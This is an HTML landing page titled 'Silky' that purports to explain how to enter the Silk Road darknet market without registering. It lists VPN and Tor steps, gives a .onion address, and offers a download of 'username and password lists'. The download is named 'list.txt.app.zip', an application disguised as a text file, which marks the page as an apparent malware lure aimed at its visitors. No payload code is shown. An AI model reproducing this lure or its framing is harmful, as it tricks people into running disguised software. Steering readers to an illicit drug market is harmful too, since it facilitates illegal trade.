<!doctype html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

        <title>Silky</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700,800" rel="stylesheet">

        <link rel="stylesheet" href="bootstrap.min.css">
        <link rel="stylesheet" href="bootstrap-theme.min.css">
        <link rel="stylesheet" href="silky.css">

        <script src="modernizr-2.8.3-respond-1.4.2.min.js"></script>
    </head>
    <body>
        

        <section class="first-section">
          <div class="container">
            <div class="row">
              <div class="col-md-12">
                <div class="text-content">
                  <h2>How to access the Silk Road without signing up</h2>
                </div>
                <div class="text-content">
                  <span>Anonymous Username &amp; Password lists</span>
                </div>
              </div>
            </div>
          </div>
        </section>

        <section class="second-section">
          <div class="container">
            <div class="row">
              <div class="col-md-10 col-md-offset-1">
                <div class="col-md-4">
                  <img class="left-image" src="left-image.png" alt="">
                </div>
                <div class="right-text col-md-8">
                  <h4>1. Download a VPN (if you've made it this far you probably have Tor installed)</h4>
                  <h4>2. Close all programs that are running and accessing the internet. This is to prevent a DNS leak. This includes Skype, Dropbox etc. Then start your downloaded VPN and Tor.</h4>

                  <h4>3. Access the site itself. The Silk Road is currently listed here: http://silkroad7rn2puhj.onion/</h4>

                   <h4>4. Download the Username & Password combinations for completely anonymous registration</h4>

                   <a href="" class="btn" download="list.txt.app.zip">Download</a>

                </div>
              </div>
            </div>
          </div>
        </section>

        <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
        <script>window.jQuery || document.write('<script src="jquery-1.11.2.min.js"><\/script>')</script>

        <script src="bootstrap.min.js"></script>

    </body>
</html>
